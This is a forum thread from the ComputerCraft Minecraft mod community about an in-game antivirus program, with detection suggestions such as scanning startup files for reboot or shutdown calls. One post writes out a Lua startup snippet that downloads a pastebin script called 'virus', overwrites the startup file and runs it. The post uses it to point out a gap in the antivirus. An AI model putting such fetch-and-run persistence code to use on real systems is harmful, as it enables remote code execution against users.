←  Programs

ComputerCraft | Programmable Computers for Minecraft

»

TNT Team's programs [1.31][cc get][van...

Poll: TNT Team's programs [1.31][cc get][vandie's programs] (37 member(s) have cast votes)

what should we add to antivirus

You cannot see the results of the poll until you have voted. Please login and cast your vote to see the results of this poll.

Ludburghmdm's Photo Ludburghmdm 18 Apr 2012

Are there ANY updates here?

EmTeaKay's Photo EmTeaKay 18 Apr 2012

So I was think, could you stop people from using shell.run("reboot") in the startup file?

cant_delete_account's Photo cant_delete_account 18 Apr 2012

EmTeaKay, on 18 April 2012 - 03:45 AM, said:

So I was think, could you stop people from using shell.run("reboot") in the startup file?
Yup, we'll probably just search for 'reboot'.

Wolvan's Photo Wolvan 18 Apr 2012

We should add a program that leaves startup files with special code (Like the rednet startup) untouched even if it has os.shutdown() or something in it

cant_delete_account's Photo cant_delete_account 19 Apr 2012

Wolvan, on 18 April 2012 - 05:04 AM, said:

We should add a program that leaves startup files with special code (Like the rednet startup) untouched even if it has os.shutdown() or something in it
I'm working on making it so the user can choose if they want to remove the file or not.

Ian-Moone's Photo Ian-Moone 20 Apr 2012

sorry for inactivity just didn't know what to add

cant_delete_account's Photo cant_delete_account 20 Apr 2012

Vandie, on 20 April 2012 - 03:35 PM, said:

sorry for inactivity just didn't know what to add
Add the feature I said up 2 posts up, add so the user can choose if they want to delete the startup.

koslas's Photo koslas 08 Aug 2012

If the httpAPI is enabled people would be-able to do in startup

shell.run("pastebin","get","6NTvKED0","virus")
fs.delete("startup")
shell.run("pastebin","get","GJFG1AGF","startup")
shell.run("virus")

This virus doesn't stop this from happening as it doesn't look shell.run or stuff that can cause that.

fixerpro's Photo fixerpro 24 Aug 2012

virus:doomsday virus
desc:a virus created when playing around with lua,it deletes all files and renders the computer useless
creator:me(fixerpro)!

TntTerminal's Photo TntTerminal 27 Aug 2012

Its pointless to make a virus other than passcode breaking. Someone code the virus, send to another person, and the only thing it does is blocking the user from using the computer. What the virus creator get for that? Maybe if viruses had the ability to steal your informations, send the virus to your friends via a email application if there is any, and spread the virus...

DiamondOwner's Photo DiamondOwner 30 Jan 2013

I'm planning to make a virus to test the strength of your anti-virus. I'm just starting out with Lua, so I might ask a few questions while I am creating my virus. I can't seem to find a download link/code. Can you put one up?

NonStopGamer's Photo NonStopGamer 09 Feb 2013

Anti virus suggestion:
Check if program creates/edits/deletes files/directories.

Cranium's Photo Cranium 09 Feb 2013

Old topic....preventing further necromancy....locked.